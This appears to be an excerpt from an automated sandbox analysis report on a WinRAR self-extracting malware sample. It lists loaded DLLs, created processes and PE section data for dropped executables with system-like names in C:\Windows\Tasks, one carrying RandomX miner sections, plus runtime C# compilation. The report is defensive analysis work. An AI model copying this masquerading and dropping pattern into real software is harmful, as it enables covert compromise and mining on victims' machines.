                                  Source: C:\ProgramData\migrate.exeSection loaded: coreuicomponents.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: coremessaging.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: ntmarta.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: wintypes.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: wintypes.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: wintypes.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: windows.storage.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: wldp.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: propsys.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: profapi.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: edputil.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: urlmon.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: iertutil.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: srvcli.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: netutils.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: windows.staterepositoryps.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: appresolver.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: bcp47langs.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: slc.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: userenv.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: sppc.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: onecorecommonproxystub.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: onecoreuapcommonproxystub.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: pcacli.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: mpr.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dll
                                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                                  Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                                  Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                                  Source: C:\Windows\Tasks\Wmiic.exeSection loaded: apphelp.dll
                                  Source: C:\Windows\Tasks\Wmiic.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                                  Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                                  Source: C:\Windows\Tasks\Wmiic.exeSection loaded: apphelp.dll
                                  Source: C:\Windows\Tasks\IntelConfigService.exeSection loaded: wsock32.dll
                                  Source: C:\Windows\Tasks\IntelConfigService.exeSection loaded: version.dll
                                  Source: C:\Windows\Tasks\IntelConfigService.exeSection loaded: winmm.dll
                                  Source: C:\Windows\Tasks\IntelConfigService.exeSection loaded: mpr.dll
                                  Source: C:\Windows\Tasks\IntelConfigService.exeSection loaded: wininet.dll
                                  Source: C:\Windows\Tasks\IntelConfigService.exeSection loaded: iphlpapi.dll
                                  Source: C:\Windows\Tasks\IntelConfigService.exeSection loaded: userenv.dll
                                  Source: C:\Windows\Tasks\IntelConfigService.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\Tasks\IntelConfigService.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\Tasks\IntelConfigService.exeSection loaded: apphelp.dll
                                  Source: C:\Windows\Tasks\Wrap.exeSection loaded: apphelp.dll
                                  Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                                  Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dll
                                  Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dll
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeSection loaded: apphelp.dll
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeSection loaded: iphlpapi.dll
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeSection loaded: userenv.dll
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeSection loaded: umpdc.dll
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeSection loaded: mswsock.dll
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeSection loaded: dhcpcsvc6.dll
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeSection loaded: dhcpcsvc.dll
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeSection loaded: dnsapi.dll
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeSection loaded: napinsp.dll
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeSection loaded: pnrpnsp.dll
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeSection loaded: wshbth.dll
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeSection loaded: nlaapi.dll
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeSection loaded: winrnr.dll
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeSection loaded: explorerframe.dll
                                  Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dll
                                  Source: C:\Windows\Tasks\Superfetch.exeSection loaded: wsock32.dll
                                  Source: C:\Windows\Tasks\Superfetch.exeSection loaded: version.dll
                                  Source: C:\Windows\Tasks\Superfetch.exeSection loaded: winmm.dll
                                  Source: C:\Windows\Tasks\Superfetch.exeSection loaded: mpr.dll
                                  Source: C:\Windows\Tasks\Superfetch.exeSection loaded: wininet.dll
                                  Source: C:\Windows\Tasks\Superfetch.exeSection loaded: iphlpapi.dll
                                  Source: C:\Windows\Tasks\Superfetch.exeSection loaded: userenv.dll
                                  Source: C:\Windows\Tasks\Superfetch.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\Tasks\Superfetch.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dll
                                  Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dll
                                  Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dll
                                  Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dll
                                  Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dll
                                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dll
                                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dll
                                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dll
                                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dll
                                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dll
                                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: version.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: dxgidebug.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: sfc_os.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: dwmapi.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: riched20.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: usp10.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: msls31.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: windowscodecs.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: textshaping.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: textinputframework.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: coreuicomponents.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: coremessaging.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: ntmarta.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: coremessaging.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: wintypes.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: wintypes.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: wintypes.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: wldp.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: propsys.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: profapi.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: edputil.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: netutils.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: windows.staterepositoryps.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: policymanager.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: msvcp110_win.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: appresolver.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: bcp47langs.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: slc.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: userenv.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: sppc.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: onecorecommonproxystub.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: onecoreuapcommonproxystub.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: pcacli.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: mpr.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                                  Source: C:\Windows\Tasks\MSTask.exeSection loaded: version.dll
                                  Source: C:\Windows\Tasks\MSTask.exeSection loaded: vcruntime140.dll
                                  Source: C:\Windows\Tasks\MSTask.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\Tasks\MSTask.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\Tasks\MSTask.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\Tasks\MSTask.exeSection loaded: libffi-7.dll
                                  Source: C:\Windows\Tasks\MSTask.exeSection loaded: iphlpapi.dll
                                  Source: C:\Windows\Tasks\MSTask.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\Tasks\MSTask.exeSection loaded: pdh.dll
                                  Source: C:\Windows\Tasks\MSTask.exeSection loaded: python3.dll
                                  Source: C:\Windows\Tasks\MSTask.exeSection loaded: umpdc.dll
                                  Source: C:\Windows\Tasks\MSTask.exeSection loaded: wtsapi32.dll
                                  Source: C:\Windows\Tasks\MSTask.exeSection loaded: libcrypto-1_1.dll
                                  Source: C:\Windows\Tasks\MSTask.exeSection loaded: libssl-1_1.dll
                                  Source: C:\Windows\Tasks\MSTask.exeSection loaded: mswsock.dll
                                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: apphelp.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: version.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: wldp.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: profapi.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: ktmw32.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: amsi.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: userenv.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: ntmarta.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: propsys.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: dlnashext.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: wpdshext.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: edputil.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: netutils.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: windows.staterepositoryps.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: wintypes.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: appresolver.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: bcp47langs.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: slc.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: sppc.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: onecorecommonproxystub.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: onecoreuapcommonproxystub.dll
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Superfetch.exe"
                                  Source: Window RecorderWindow detected: More than 3 window changes detected
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                                  Source: IYXE4Uz61k.exeStatic file information: File size 50529184 > 1048576
                                  Source: IYXE4Uz61k.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                  Source: IYXE4Uz61k.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                  Source: IYXE4Uz61k.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                  Source: IYXE4Uz61k.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                  Source: IYXE4Uz61k.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                  Source: IYXE4Uz61k.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                  Source: IYXE4Uz61k.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                  Source: IYXE4Uz61k.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: IYXE4Uz61k.exe
                                  Source: Binary string: C:\A\21\b\bin\amd64\_bz2.pdb source: MSTask.exe, 00000038.00000003.1914851893.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdbMM source: MSTask.exe, 00000038.00000003.1915593083.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\A\21\b\bin\amd64\_queue.pdb source: MSTask.exe, 00000038.00000003.1915801440.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: vcruntime140.amd64.pdbGCTL source: MSTask.exe, 00000038.00000003.1914695345.00000286A4AC0000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\A\21\b\bin\amd64\_ssl.pdb source: _ssl.pyd.56.dr
                                  Source: Binary string: C:\A\21\b\bin\amd64\_socket.pdb source: MSTask.exe, 00000038.00000003.1916048595.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\A\21\b\bin\amd64\python3.pdb source: MSTask.exe, 00000038.00000003.1924711408.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924749647.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\A\21\b\bin\amd64\_hashlib.pdb source: MSTask.exe, 00000038.00000003.1915475879.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\214ckojv\214ckojv.pdb source: Bridgeprovider.exe, 00000041.00000002.2009860535.0000000003C3B000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1d 10 Sep 2019built on: Mon Sep 16 11:00:37 2019 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: MSTask.exe, 0000003E.00000002.4153223643.00007FFDFB243000.00000002.00000001.01000000.0000001C.sdmp
                                  Source: Binary string: C:\A\21\b\bin\amd64\select.pdb source: MSTask.exe, 00000038.00000003.1927571223.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: MSTask.exe, 0000003E.00000002.4153223643.00007FFDFB243000.00000002.00000001.01000000.0000001C.sdmp
                                  Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdb source: MSTask.exe, 00000038.00000003.1915593083.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\A\21\b\bin\amd64\unicodedata.pdb source: MSTask.exe, 00000038.00000003.1927960487.00000286A4ACD000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: kockv.pdb source: Bridgeprovider.exe, 00000041.00000002.2037973989.000000001BD19000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: vcruntime140.amd64.pdb source: MSTask.exe, 00000038.00000003.1914695345.00000286A4AC0000.00000004.00000020.00020000.00000000.sdmp
                                  Source: IYXE4Uz61k.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                  Source: IYXE4Uz61k.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                  Source: IYXE4Uz61k.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                  Source: IYXE4Uz61k.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                  Source: IYXE4Uz61k.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                  Source: C:\Windows\Bridgeprovider.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\214ckojv\214ckojv.cmdline"
                                  Source: C:\Windows\Bridgeprovider.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\214ckojv\214ckojv.cmdline"
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 31_2_0000000140023A88 LoadLibraryA,GetProcAddress,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,31_2_0000000140023A88
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeFile created: C:\ProgramData\__tmp_rar_sfx_access_check_4306734Jump to behavior
                                  Source: IYXE4Uz61k.exeStatic PE information: section name: .didat
                                  Source: migrate.exe.0.drStatic PE information: section name: .didat
                                  Source: ApplicationsFrameHost.exe.26.drStatic PE information: section name: _RANDOMX
                                  Source: ApplicationsFrameHost.exe.26.drStatic PE information: section name: _TEXT_CN
                                  Source: ApplicationsFrameHost.exe.26.drStatic PE information: section name: _TEXT_CN
                                  Source: ApplicationsFrameHost.exe.26.drStatic PE information: section name: _RDATA
                                  Source: MSTask.exe.26.drStatic PE information: section name: _RDATA
                                  Source: Wrap.exe.26.drStatic PE information: section name: _RDATA
                                  Source: MicrosoftPrt.exe.26.drStatic PE information: section name: _RDATA
                                  Source: 1.exe.26.drStatic PE information: section name: .didat
                                  Source: MicrosoftPrt.exe.27.drStatic PE information: section name: _RDATA
                                  Source: libcrypto-1_1.dll.56.drStatic PE information: section name: .00cfg
                                  Source: libssl-1_1.dll.56.drStatic PE information: section name: .00cfg
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: 0_2_0088F640 push ecx; ret 0_2_0088F653
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: 0_2_0088EB78 push eax; ret 0_2_0088EB96
                                  Source: C:\ProgramData\migrate.exeCode function: 26_2_0012F640 push ecx; ret 26_2_0012F653
                                  Source: C:\ProgramData\migrate.exeCode function: 26_2_0012EB78 push eax; ret 26_2_0012EB96
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 31_2_00000001400055DB push rcx; iretd 31_2_00000001400055DC
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DD510C push rcx; retf 0000h56_2_00007FF7B1DD510D
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_003FF640 push ecx; ret 60_2_003FF653
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_003FEB78 push eax; ret 60_2_003FEB96
                                  Source: C:\Windows\Bridgeprovider.exeCode function: 65_2_00007FFD9AFF540B push ss; ret 65_2_00007FFD9AFF5411
                                  Source: C:\Windows\Bridgeprovider.exeCode function: 65_2_00007FFD9B1A115D push ebp; iretd 65_2_00007FFD9B1A1160
                                  Source: C:\Windows\Bridgeprovider.exeCode function: 65_2_00007FFD9B247475 pushad ; ret 65_2_00007FFD9B247476
                                  Source: C:\Windows\Bridgeprovider.exeCode function: 65_2_00007FFD9B2474C3 push eax; ret 65_2_00007FFD9B2474C4
                                  Source: C:\Windows\Bridgeprovider.exeCode function: 65_2_00007FFD9B247507 push eax; ret 65_2_00007FFD9B247508
                                  Source: C:\Windows\Bridgeprovider.exeCode function: 65_2_00007FFD9B24752E pushad ; ret 65_2_00007FFD9B24752F
                                  Source: C:\Windows\Bridgeprovider.exeCode function: 65_2_00007FFD9B24753A push ebp; iretd 65_2_00007FFD9B247540
                                  Source: C:\Windows\Bridgeprovider.exeCode function: 65_2_00007FFD9B6E7C2F pushad ; retf 65_2_00007FFD9B6E7C5D
                                  Source: C:\Windows\Bridgeprovider.exeCode function: 65_2_00007FFD9B6E62D4 push FFFFFFE8h; ret 65_2_00007FFD9B6E68F9
